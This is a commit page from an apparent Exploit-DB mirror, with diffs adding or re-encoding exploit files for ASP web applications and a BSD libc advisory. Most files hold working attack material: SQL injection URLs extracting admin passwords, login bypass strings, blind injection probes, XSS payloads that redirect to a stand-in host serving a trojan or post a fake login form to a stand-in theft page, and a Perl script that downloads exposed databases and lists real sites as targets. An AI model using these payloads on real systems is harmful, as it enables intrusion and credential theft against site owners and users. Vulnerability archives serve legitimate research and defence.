bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 12_12_2013

Browse source
This commit is contained in:
Offensive Security 2013-12-12 21:02:26 +00:00
parent 5a468df6b9
commit 6bd122cd4b
229 changed files with 17060 additions and 13228 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

2940
files.csv
View file

File diff suppressed because it is too large Load diff

6
platforms/aix/local/1001.txt
View file

@ -284,6 +284,6 @@ bash-2.05b#
bash-2.05b# rm /tmp/.bel*
bash-2.05b# rm /tmp/passwd
bash-2.05b#
# milw0rm.com [2005-05-19]
# milw0rm.com [2005-05-19]

9
platforms/asp/webapps/30141.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24288/info
Hünkaray Okul Portalý is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
An attacker can exploit this issue by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
Hünkaray Okul Portalý 1.1 is vulnerable to this issue.
http://www.example.com/okul/haberoku.asp?id=11%20union+select+0,sifre,kullaniciadi,3,4+from+admin

7
platforms/asp/webapps/30159.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/24345/info
ASP Folder Gallery is prone to an arbitrary-file-download vulnerability because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit this issue to download arbitrary files within the context of the affected webserver.
http://www.example.com/aspfoldergallery/download_script.asp?file=viewimage.asp

9
platforms/asp/webapps/30165.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24379/info
Ibrahim Ã?AKICI Okul Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
An attacker can exploit this issue by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
Ibrahim Ã?AKICI Okul Portal 2.0 is vulnerable to this issue.
http://www.example.com/haber_oku.asp?id=9%20union+select+0,sifre,kulladi,3,4,5,6+from+uyeler

20
platforms/asp/webapps/30195.txt Executable file
View file

@ -0,0 +1,20 @@
#********************************************************************************
# Exploit Title : Webnet Studio Sql Injection Vulnerability
#
# Exploit Author : Ashiyane Digital Security Team
#
# Vendor Homepage : http://www.webnetstudio.it
#
# Google Dork : intext:"powered by Webnet Studio"
#
# Date: 2013-12-10
#
# Tested on: Windows 7 , Linux
#
# discovered by : ACC3SS
-------------------------------------------------------------------
# Exploit : Sql Injection
#
# Location : [Target]/content.asp?ID=[Sql Injection]
#
######################

7
platforms/asp/webapps/30198.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/24515/info
TDizin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
Exploiting this vulnerability may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/TDizin/arama.asp?ara= "><script>alert("G3");</script>&submit=+T%27ARA+

11
platforms/asp/webapps/30203.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/24562/info
Comersus Cart is affected by multiple input validation vulnerabilities.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
The attacker may also leverage this issue to execute arbitrary code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Comersus Cart 7.0.7 is vulnerable; other versions may also be affected.
http://www.example.com/store/comersus_optReviewReadExec.asp?idProduct='

11
platforms/asp/webapps/30204.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/24562/info
Comersus Cart is affected by multiple input validation vulnerabilities.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
The attacker may also leverage this issue to execute arbitrary code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Comersus Cart 7.0.7 is vulnerable; other versions may also be affected.
http://www.example.com/path/store/comersus_customerAuthenticateForm.asp?redirectUrl="><script>window.location="http://www.Evil_Site.com/Trojan.exe"</script>

11
platforms/asp/webapps/30205.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/24562/info
Comersus Cart is affected by multiple input validation vulnerabilities.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
The attacker may also leverage this issue to execute arbitrary code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Comersus Cart 7.0.7 is vulnerable; other versions may also be affected.
http://www.example.com/path/store/comersus_message.asp?message=<script src=http://www.Site.com/Evil_Script.js></script> http://www.example.com/path/store/comersus_message.asp?message=<form%20action="http://www.Evil_Site.com/Steal_Info.asp"%20method="post">Username:<input%20name="username"%20type="text"%20maxlength="10"><br>Password:<input%20name="password"%2 0type="text"%20maxlength="10"><br><input%20name="login"%20type="submit"%20value ="Login"></form>

7
platforms/asp/webapps/30207.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/24563/info
FuseTalk is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit these issues to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/blog/include/common/comfinish.cfm?FTRESULT.errorcode=0&FTVAR_SCRIPTRUN=[xss]

36
platforms/asp/webapps/3549.txt
View file

@ -1,18 +1,18 @@
#Title : Active Trade Remote SQL Injection Vulnerability
#Author : CyberGhost
#Demo Page : http://www.activewebsoftwares.com/demoactivetrade
#Script Page : http://www.activewebsoftwares.com/productinfo.aspx?productid=32
#Vuln.
#Username : /default.asp?catid=-1+union+select+0,adminname,2+from+admins%20where%20adminid=1
#Password : /default.asp?catid=-1+union+select+0,password,2+from+admins%20where%20adminid=1
#Admin Login : /admin.asp
====================================
Thanx : redLine - Hackinger - excellance - Liarhack - SaCReD SeeR - MaTRax - KinSize - BolivaR - kerem125 - by_emR3
And All TURKISH HACKERS !
# milw0rm.com [2007-03-23]
#Title : Active Trade Remote SQL Injection Vulnerability
#Author : CyberGhost
#Demo Page : http://www.activewebsoftwares.com/demoactivetrade
#Script Page : http://www.activewebsoftwares.com/productinfo.aspx?productid=32
#Vuln.
#Username : /default.asp?catid=-1+union+select+0,adminname,2+from+admins%20where%20adminid=1
#Password : /default.asp?catid=-1+union+select+0,password,2+from+admins%20where%20adminid=1
#Admin Login : /admin.asp
====================================
Thanx : redLine - Hackinger - excellance - Liarhack - SaCReD SeeR - MaTRax - KinSize - BolivaR - kerem125 - by_emR3
And All TURKISH HACKERS !
# milw0rm.com [2007-03-23]

30
platforms/asp/webapps/7137.txt
View file

@ -1,15 +1,15 @@
/*
OpenASP <= 3.0 Blind SQL Injection Vulnerability
-----------------------------------------------------
by athos - staker[at]hotmail[dot]it
thanks XaDoS,anyway i've found another sql injection
http://openasp.it
-----------------------------------------------------
default.asp?modulo=pages&idpage=1 or 1=1 (true)
default.asp?modulo=pages&idpage=1 or 1=2 (false)
default.asp?modulo=pages&idpage=-1 and substring(@@version,1,1)=4/*
*/
# milw0rm.com [2008-11-17]
/*
OpenASP <= 3.0 Blind SQL Injection Vulnerability
-----------------------------------------------------
by athos - staker[at]hotmail[dot]it
thanks XaDoS,anyway i've found another sql injection
http://openasp.it
-----------------------------------------------------
default.asp?modulo=pages&idpage=1 or 1=1 (true)
default.asp?modulo=pages&idpage=1 or 1=2 (false)
default.asp?modulo=pages&idpage=-1 and substring(@@version,1,1)=4/*
*/
# milw0rm.com [2008-11-17]

84
platforms/asp/webapps/7278.txt
View file

@ -1,42 +1,42 @@
[~] ----------------------------بسم الله الرحمن الرحيم------------------------------
[~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
[~]Vendor: www.activewebsoftwares.com
[~]Software: Active Membership v 2
[~]author: ((я3d D3v!L))
[~] Date: 28.11.2008
[~] Home: www.ahacker.biz
[~] contact: N/A
[~] -----------------------------{str0ke}------------------------------
[~] Exploit:
username: r0' or ' 1=1--
password: r0' or ' 1=1--
[~]login 4 d3m0:
http://www.activewebsoftwares.com/demoactivemembership/account.asp
[~]-----------------------------{str0ke}---------------------------------------------------
[~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker
[~]
[~] spechial thanks : dolly & 7am3m & عماد ,الزهيري
[~]
[~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
[~]
[~] xp10.biz & ahacker.biz
[~]
[~]--------------------------------------------------------------------------------
# milw0rm.com [2008-11-29]
[~] ----------------------------بسم الله الرحمن الرحيم------------------------------
[~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
[~]Vendor: www.activewebsoftwares.com
[~]Software: Active Membership v 2
[~]author: ((я3d D3v!L))
[~] Date: 28.11.2008
[~] Home: www.ahacker.biz
[~] contact: N/A
[~] -----------------------------{str0ke}------------------------------
[~] Exploit:
username: r0' or ' 1=1--
password: r0' or ' 1=1--
[~]login 4 d3m0:
http://www.activewebsoftwares.com/demoactivemembership/account.asp
[~]-----------------------------{str0ke}---------------------------------------------------
[~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker
[~]
[~] spechial thanks : dolly & 7am3m & عماد ,الزهيري
[~]
[~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
[~]
[~] xp10.biz & ahacker.biz
[~]
[~]--------------------------------------------------------------------------------
# milw0rm.com [2008-11-29]

90
platforms/asp/webapps/7279.txt
View file

@ -1,45 +1,45 @@
[~] ----------------------------بسم الله الرحمن الرحيم------------------------------
وما أوتيتم من العلم الا قليلا
[~]-------------------------------صدق الله العظيم-------------------------------
[~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
[~]Vendor: www.activewebsoftwares.com
[~]Software: eWebquiz v 8
[~]author: ((я3d D3v!L))
[~] Date: 28.11.2008
[~] Home: www.ahacker.biz
[~] contact: N/A
[~] -----------------------------{str0ke}------------------------------
[~] Exploit:
username: r0' or ' 1=1--
password: r0' or ' 1=1--
[~]login 4 d3m0:
http://www.activewebsoftwares.com/demoewebquiz/register.asp
[~]-----------------------------{str0ke}---------------------------------------------------
[~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker
[~]
[~] spechial thanks : dolly & 7am3m & عماد ,الزهيري
[~]
[~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
[~]
[~] xp10.biz & ahacker.biz
[~]
[~]--------------------------------------------------------------------------------
# milw0rm.com [2008-11-29]
[~] ----------------------------بسم الله الرحمن الرحيم------------------------------
وما أوتيتم من العلم الا قليلا
[~]-------------------------------صدق الله العظيم-------------------------------
[~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
[~]Vendor: www.activewebsoftwares.com
[~]Software: eWebquiz v 8
[~]author: ((я3d D3v!L))
[~] Date: 28.11.2008
[~] Home: www.ahacker.biz
[~] contact: N/A
[~] -----------------------------{str0ke}------------------------------
[~] Exploit:
username: r0' or ' 1=1--
password: r0' or ' 1=1--
[~]login 4 d3m0:
http://www.activewebsoftwares.com/demoewebquiz/register.asp
[~]-----------------------------{str0ke}---------------------------------------------------
[~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker
[~]
[~] spechial thanks : dolly & 7am3m & عماد ,الزهيري
[~]
[~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
[~]
[~] xp10.biz & ahacker.biz
[~]
[~]--------------------------------------------------------------------------------
# milw0rm.com [2008-11-29]

90
platforms/asp/webapps/7281.txt
View file

@ -1,45 +1,45 @@
[~] ----------------------------بسم الله الرحمن الرحيم------------------------------
[~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
[~]Vendor: www.activewebsoftwares.com
[~]Software: Active Web Mail v 4
[~]author: ((я3d D3v!L))
[~] Date: 28.11.2008
[~] Home: www.ahacker.biz
[~] contact: N/A
[~] -----------------------------{str0ke}------------------------------
[~] Exploit:
Email: any mail
password: r0' or ' 1=1--
[~]login 4 d3m0:
www.activewebsoftwares.com/DemoActiveWebmail/login.aspx
[~]-----------------------------{str0ke}---------------------------------------------------
[~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker
[~]
[~] spechial thanks : dolly & 7am3m & عماد ,الزهيري
[~]
[~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
[~]
[~] xp10.biz & ahacker.biz
[~]
[~]--------------------------------------------------------------------------------
# milw0rm.com [2008-11-29]
[~] ----------------------------بسم الله الرحمن الرحيم------------------------------
[~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
[~]Vendor: www.activewebsoftwares.com
[~]Software: Active Web Mail v 4
[~]author: ((я3d D3v!L))
[~] Date: 28.11.2008
[~] Home: www.ahacker.biz
[~] contact: N/A
[~] -----------------------------{str0ke}------------------------------
[~] Exploit:
Email: any mail
password: r0' or ' 1=1--
[~]login 4 d3m0:
www.activewebsoftwares.com/DemoActiveWebmail/login.aspx
[~]-----------------------------{str0ke}---------------------------------------------------
[~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker
[~]
[~] spechial thanks : dolly & 7am3m & عماد ,الزهيري
[~]
[~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
[~]
[~] xp10.biz & ahacker.biz
[~]
[~]--------------------------------------------------------------------------------
# milw0rm.com [2008-11-29]

136
platforms/asp/webapps/7288.txt
View file

@ -1,68 +1,68 @@
[~] ----------------------------بسم الله الرحمن الرحيم------------------------------
[~]Tybe:(emails.aspx TabOpenQuickTab1) Blind SQL Injection Vulnerability
[~]Vendor:www.activewebsoftwares.com
[~]Software: Active Web Mail v 4
[~]author: ((я3d D3v!L))
[~] Date: 28.11.2008
[~] Home: www.ahacker.biz
[~] contact: N/A
[~] -----------------------------------------------------------
[~]3xpL0!7 4 d3m0:
www.activewebsoftwares.com/DemoActiveWebmail/popaccounts.aspx?TabOpenQuickTab1={bL!ND}
0R
www.activewebsoftwares.com/DemoActiveWebmail/addressbook.aspx?TabOpenQuickTab1={str0ke}
www.activewebsoftwares.com/DemoActiveWebmail/emails.aspx?TabOpenQuickTab1=((я3d D3v!L))
[~] 8L!/\/D:
7Ru3 : popaccounts.aspx?TabOpenQuickTab1=1 and 1=1
f4L53: popaccounts.aspx?TabOpenQuickTab1=1 and 1=2
0R
7Ru3 : addressbook.aspx?TabOpenQuickTab1=1 and 1=1
f4L53: addressbook.aspx?TabOpenQuickTab1=1 and 1=2
7Ru3 : emails.aspx?TabOpenQuickTab1=1 and 1=1
f4L53: emails.aspx?TabOpenQuickTab1=1 and 1=2
N073:
! 7h!/\/k u can f!nd m0r3
just let your m1nd breath ;)
[~]--------------------------------------------------------------------------------
[~] Greetz tO: {str0ke} &keta &m4n0n & maxmos & EV!L KS@ & hesham_hacker &الزهيري
[~]
[~] spechial thanks : dolly & 7am3m & عماد & {str0ke}
[~]
[~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
[~]
[~] xp10.biz & ahacker.biz
[~]
[~]--------------------------------------------------------------------------------
# milw0rm.com [2008-11-29]
[~] ----------------------------بسم الله الرحمن الرحيم------------------------------
[~]Tybe:(emails.aspx TabOpenQuickTab1) Blind SQL Injection Vulnerability
[~]Vendor:www.activewebsoftwares.com
[~]Software: Active Web Mail v 4
[~]author: ((я3d D3v!L))
[~] Date: 28.11.2008
[~] Home: www.ahacker.biz
[~] contact: N/A
[~] -----------------------------------------------------------
[~]3xpL0!7 4 d3m0:
www.activewebsoftwares.com/DemoActiveWebmail/popaccounts.aspx?TabOpenQuickTab1={bL!ND}
0R
www.activewebsoftwares.com/DemoActiveWebmail/addressbook.aspx?TabOpenQuickTab1={str0ke}
www.activewebsoftwares.com/DemoActiveWebmail/emails.aspx?TabOpenQuickTab1=((я3d D3v!L))
[~] 8L!/\/D:
7Ru3 : popaccounts.aspx?TabOpenQuickTab1=1 and 1=1
f4L53: popaccounts.aspx?TabOpenQuickTab1=1 and 1=2
0R
7Ru3 : addressbook.aspx?TabOpenQuickTab1=1 and 1=1
f4L53: addressbook.aspx?TabOpenQuickTab1=1 and 1=2
7Ru3 : emails.aspx?TabOpenQuickTab1=1 and 1=1
f4L53: emails.aspx?TabOpenQuickTab1=1 and 1=2
N073:
! 7h!/\/k u can f!nd m0r3
just let your m1nd breath ;)
[~]--------------------------------------------------------------------------------
[~] Greetz tO: {str0ke} &keta &m4n0n & maxmos & EV!L KS@ & hesham_hacker &الزهيري
[~]
[~] spechial thanks : dolly & 7am3m & عماد & {str0ke}
[~]
[~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
[~]
[~] xp10.biz & ahacker.biz
[~]
[~]--------------------------------------------------------------------------------
# milw0rm.com [2008-11-29]

132
platforms/asp/webapps/7293.txt
View file

@ -1,66 +1,66 @@
***********************************************************************************************************************************************************
[!] [!]
[!] OOOO O OOOOOOOOO [!]
[!] O O O O O [!]
[!] O O O [!]
[!] O OOOO OOOO OOOOOO OOOO OOO OO O OOOO OO OO OOOO [!]
[!] O OOO OOO O O O O OO O O O O OO O O O [!]
[!] O OO OO O O OOOOOO O ******* O O O O O OOOOOO [!]
[!] O O OOOO O O O O O O O O O O O [!]
[!] OOOO OO OOOOOO OOOO OOOOOO OOOOOOOOO OOOO OOO OOO OOOO [!]
[!] OO [!]
[!] OO [!]
[!] OO Proud To Be MoroCCaN [!]
[!] OO WwW.Exploiter5.CoM , WwW.No-Exploit.CoM , WwW.IQ-TY.CoM [!]
***********************************************************************************************************************************************************
+---- Bismi Allah Irahmani ArraHim ----+
++--------------------------------------------------------------------------------------------------------------------------------------------------------+
++ [ Active Web Helpdesk v 2 (Auth Bypass) SQL Injection Vulnerability ] ++
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
: Author : Cyber-Zone ( Abdelkhalek ) : : :
¦ E-MaiL : Paradis_des_fous[at]hotmail[dot]fr ¦ ¦ ¦
¦ Home : WwW.IQ-Ty.CoM ¦ ¦ MySQL Version Is : ¦
¦ TeaM : Mor0ccan nightamres ¦ ¦ ¦
¦ Script : http://activewebsoftwares.com ¦ ¦ ![ ]! ¦
¦ Download : http://activewebsoftwares.com/P12_ActiveWebHelpdesk.aspx?Tabopen= ¦ ¦ ¦
¦ RisK : High [¦¦¦¦¦¦¦¦] ¦ ¦ ¦
¦ --------------------------------------------------------------------------------------------------------+ +-------------------------------------- ¦
¦ From The Dark Side Of MoroCCo ++
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
: :
¦ Remember : ¦
¦ ------------- ¦
¦ ¦
¦ This information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages. ¦
¦ ¦
++--------------------------------------------------------------------------------------------------------------------------------------------------------+
++ [!] RaHa NaYda NoooooooooooD ; Anti-Connexion Den MouK [!] ++
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
Bypass : ........
Go To The Admin Panel.
and Login with this information :
username : r0' or ' 1=1--
password : r0' or ' 1=1--
To Test :
http://activewebsoftwares.com/demoactivewebhelpdesk/adminlogin.aspx?ReturnURL=admindefault.aspx
EnjoY.
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
+---- ThanX To ----+
++--------------------------------------------------------------------------------------------------------------------------------------------------------+
++[ $ Hussin X , $ StaCk , $ JIKO , $ The_5p3cTrum , $ BayHay , $ str0ke , $ Oujda-Lord , $ GeneraL , $ Force-Major , $ WaLid , $ Oujda & Figuig City ]++
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
= [AttaCk Is CompLet] =
___________________________________________________________________________________________________________________________________________________________
# milw0rm.com [2008-11-29]
***********************************************************************************************************************************************************
[!] [!]
[!] OOOO O OOOOOOOOO [!]
[!] O O O O O [!]
[!] O O O [!]
[!] O OOOO OOOO OOOOOO OOOO OOO OO O OOOO OO OO OOOO [!]
[!] O OOO OOO O O O O OO O O O O OO O O O [!]
[!] O OO OO O O OOOOOO O ******* O O O O O OOOOOO [!]
[!] O O OOOO O O O O O O O O O O O [!]
[!] OOOO OO OOOOOO OOOO OOOOOO OOOOOOOOO OOOO OOO OOO OOOO [!]
[!] OO [!]
[!] OO [!]
[!] OO Proud To Be MoroCCaN [!]
[!] OO WwW.Exploiter5.CoM , WwW.No-Exploit.CoM , WwW.IQ-TY.CoM [!]
***********************************************************************************************************************************************************
+---- Bismi Allah Irahmani ArraHim ----+
++--------------------------------------------------------------------------------------------------------------------------------------------------------+
++ [ Active Web Helpdesk v 2 (Auth Bypass) SQL Injection Vulnerability ] ++
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
: Author : Cyber-Zone ( Abdelkhalek ) : : :
¦ E-MaiL : Paradis_des_fous[at]hotmail[dot]fr ¦ ¦ ¦
¦ Home : WwW.IQ-Ty.CoM ¦ ¦ MySQL Version Is : ¦
¦ TeaM : Mor0ccan nightamres ¦ ¦ ¦
¦ Script : http://activewebsoftwares.com ¦ ¦ ![ ]! ¦
¦ Download : http://activewebsoftwares.com/P12_ActiveWebHelpdesk.aspx?Tabopen= ¦ ¦ ¦
¦ RisK : High [¦¦¦¦¦¦¦¦] ¦ ¦ ¦
¦ --------------------------------------------------------------------------------------------------------+ +-------------------------------------- ¦
¦ From The Dark Side Of MoroCCo ++
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
: :
¦ Remember : ¦
¦ ------------- ¦
¦ ¦
¦ This information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages. ¦
¦ ¦
++--------------------------------------------------------------------------------------------------------------------------------------------------------+
++ [!] RaHa NaYda NoooooooooooD ; Anti-Connexion Den MouK [!] ++
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
Bypass : ........
Go To The Admin Panel.
and Login with this information :
username : r0' or ' 1=1--
password : r0' or ' 1=1--
To Test :
http://activewebsoftwares.com/demoactivewebhelpdesk/adminlogin.aspx?ReturnURL=admindefault.aspx
EnjoY.
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
+---- ThanX To ----+
++--------------------------------------------------------------------------------------------------------------------------------------------------------+
++[ $ Hussin X , $ StaCk , $ JIKO , $ The_5p3cTrum , $ BayHay , $ str0ke , $ Oujda-Lord , $ GeneraL , $ Force-Major , $ WaLid , $ Oujda & Figuig City ]++
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
= [AttaCk Is CompLet] =
___________________________________________________________________________________________________________________________________________________________
# milw0rm.com [2008-11-29]

104
platforms/asp/webapps/7327.txt
View file

@ -1,52 +1,52 @@
[~] ----------------------------بسم الله الرحمن الرحيم------------------------------
[~]Tybe:(calendar_Eventupdate.asp ID) Blind SQL Injection Vulnerability
[~]Vendor: www.mxmania.net
[~]Software: Calendar Mx Professional
[~]author: ((я3d D3v!L))
[~] Date: 28.11.2008
[~] Home: www.ahacker.biz
[~] contact: N/A
[~] --------------------------------{str0ke}---------------------------
[~]3xpL0!7 4 d3m0:
http://calendar.mxmania.net/calendar_Eventupdate.asp?ID={bL!ND}
[~] 8L!/\/D:
7Ru3 : calendar_Eventupdate.asp?ID=1 and 1=1
f4L53: calendar_Eventupdate.asp?ID=1 and 1=2
N073:
! 7h!/\/k u can f!nd m0r3
just let your m1nd breath ;)
[[~]----------------------------------------{str0ke}----------------------------------------------
[~] Greetz tO: {str0ke} & c08RA & black_R0se& maxmos & EV!L KS@ & hesham_hacker &EL z0herY
[~]
[~] spechial thanks : dolly & 7am3m & W4L3d ? & {str0ke}
[~]
[~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
[~]
[~] xp10.biz & ahacker.biz
[~]
[~]-----------------------------------------{str0ke}----------------------------------------------
# milw0rm.com [2008-12-03]
[~] ----------------------------بسم الله الرحمن الرحيم------------------------------
[~]Tybe:(calendar_Eventupdate.asp ID) Blind SQL Injection Vulnerability
[~]Vendor: www.mxmania.net
[~]Software: Calendar Mx Professional
[~]author: ((я3d D3v!L))
[~] Date: 28.11.2008
[~] Home: www.ahacker.biz
[~] contact: N/A
[~] --------------------------------{str0ke}---------------------------
[~]3xpL0!7 4 d3m0:
http://calendar.mxmania.net/calendar_Eventupdate.asp?ID={bL!ND}
[~] 8L!/\/D:
7Ru3 : calendar_Eventupdate.asp?ID=1 and 1=1
f4L53: calendar_Eventupdate.asp?ID=1 and 1=2
N073:
! 7h!/\/k u can f!nd m0r3
just let your m1nd breath ;)
[[~]----------------------------------------{str0ke}----------------------------------------------
[~] Greetz tO: {str0ke} & c08RA & black_R0se& maxmos & EV!L KS@ & hesham_hacker &EL z0herY
[~]
[~] spechial thanks : dolly & 7am3m & W4L3d ? & {str0ke}
[~]
[~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
[~]
[~] xp10.biz & ahacker.biz
[~]
[~]-----------------------------------------{str0ke}----------------------------------------------
# milw0rm.com [2008-12-03]

102
platforms/asp/webapps/8610.pl
View file

@ -1,51 +1,51 @@
#!/usr/bin/perl
#
#
# Ublog access version
# mdb-database/blog.mdb
# dork : http://www.google.co.ma/search?q=index.asp%3Farchivio%3DOK&hl=fr&start=20&sa=N
# demos :
# http://radiologyhunters.com/blog/mdb-database/blog.mdb
# http://foges.net/mdb-database/blog.mdb
# http://www.geoaurea.it/mdb-database/blog.mdb
#
#
use LWP::Simple;
use LWP::UserAgent;
print "\tUblog access version Arbitrary Database Disclosure Exploit\n";
print "\t****************************************************************\n";
print "\t* Found And Exploited By : Cyber-Zone (ABDELKHALEK) *\n";
print "\t* E-mail : Paradis_des_fous[at]hotmail.fr *\n";
print "\t* Home : WwW.IQ-TY.CoM , WwW.No-Exploit.CoM *\n";
print "\t* From : MoroccO Figuig/Oujda City *\n";
print "\t****************************************************************\n\n\n\n";
if(@ARGV < 1)
{
&help; exit();
}
sub help()
{
print "[X] Usage : perl $0 site \n";
print "[X] Exemple : perl $0 www.site.com \n";
}
($site) = @ARGV;
print("Please Wait ! Connecting To The Server ......\n\n");
sleep(5);
$database = "mdb-database/blog.mdb";
my $exploit = "http://" . $site . "/" . $database;
print("Searching For file ...\n\n");
sleep(3);
$doexploit=get $exploit;
if($doexploit){
print("..........................File Contents...........................\n");
print("$doexploit\n");
print("..............................EOF.................................\n");
}
else {
help();
exit;
}
# milw0rm.com [2009-05-04]
#!/usr/bin/perl
#
#
# Ublog access version
# mdb-database/blog.mdb
# dork : http://www.google.co.ma/search?q=index.asp%3Farchivio%3DOK&hl=fr&start=20&sa=N
# demos :
# http://radiologyhunters.com/blog/mdb-database/blog.mdb
# http://foges.net/mdb-database/blog.mdb
# http://www.geoaurea.it/mdb-database/blog.mdb
#
#
use LWP::Simple;
use LWP::UserAgent;
print "\tUblog access version Arbitrary Database Disclosure Exploit\n";
print "\t****************************************************************\n";
print "\t* Found And Exploited By : Cyber-Zone (ABDELKHALEK) *\n";
print "\t* E-mail : Paradis_des_fous[at]hotmail.fr *\n";
print "\t* Home : WwW.IQ-TY.CoM , WwW.No-Exploit.CoM *\n";
print "\t* From : MoroccO Figuig/Oujda City *\n";
print "\t****************************************************************\n\n\n\n";
if(@ARGV < 1)
{
&help; exit();
}
sub help()
{
print "[X] Usage : perl $0 site \n";
print "[X] Exemple : perl $0 www.site.com \n";
}
($site) = @ARGV;
print("Please Wait ! Connecting To The Server ......\n\n");
sleep(5);
$database = "mdb-database/blog.mdb";
my $exploit = "http://" . $site . "/" . $database;
print("Searching For file ...\n\n");
sleep(3);
$doexploit=get $exploit;
if($doexploit){
print("..........................File Contents...........................\n");
print("$doexploit\n");
print("..............................EOF.................................\n");
}
else {
help();
exit;
}
# milw0rm.com [2009-05-04]

474
platforms/bsd/dos/8163.txt
View file

@ -1,237 +1,237 @@
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[libc:fts_*():multiple vendors, Denial-of-service ]
Author: Maksymilian Arciemowicz
SecurityReason.com
Date:
- - Dis.: 21.10.2008
- - Pub.: 04.03.2009
CVE: CVE-2009-0537
We are going informing all vendors, about this problem.
Affected Software (official):
- - OpenBSD 4.4
/usr/src/lib/libc/gen/fts.c
- - Microsoft Interix
6.0 10.0.6030.0 x86
- - Microsft Vista Enterprise
SearchIndexer.exe
probably more...
Original URL:
http://securityreason.com/achievement_securityalert/60
- --- 0.Description ---
The fts functions are provided for traversing UNIX file hierarchies.
The fts_open() function returns a "handle" on a file hierarchy, which is then supplied to the other fts functions.
The function fts_read() returns a pointer to a structure describing one of the files in the file hierarchy.
The function fts_children() returns a pointer to a linked list of structures, each of which describes one of the files contained in a directory within the hierarchy.
typedef struct _ftsent {
unsigned short fts_info; /* flags for FTSENT structure */
char *fts_accpath; /* access path */
char *fts_path; /* root path */
size_t fts_pathlen; /* strlen(fts_path) */
char *fts_name; /* file name */
size_t fts_namelen; /* strlen(fts_name) */
short fts_level; /* depth (-1 to N) */
int fts_errno; /* file errno */
long fts_number; /* local numeric value */
void *fts_pointer; /* local address value */
struct _ftsent *fts_parent; /* parent directory */
struct _ftsent *fts_link; /* next file structure */
struct _ftsent *fts_cycle; /* cycle structure */
struct stat *fts_statp; /* stat(2) information */
} FTSENT;
- --- 1. libc:fts_*():multiple vendors, Denial-of-service ---
The main problem exist in fts_level from ftsent structure. Type of fts_level is short.
let's see /usr/src/lib/libc/gen/fts.c (OpenBSD)
- ---line-616-625---
/*
* Figure out the max file name length that can be stored in the
* current path -- the inner loop allocates more path as necessary.
* We really wouldn't have to do the maxlen calculations here, we
* could do them in fts_read before returning the path, but it's a
* lot easier here since the length is part of the dirent structure.
*
* If not changing directories set a pointer so that can just append
* each new name into the path.
*/
- ---line-616-625---
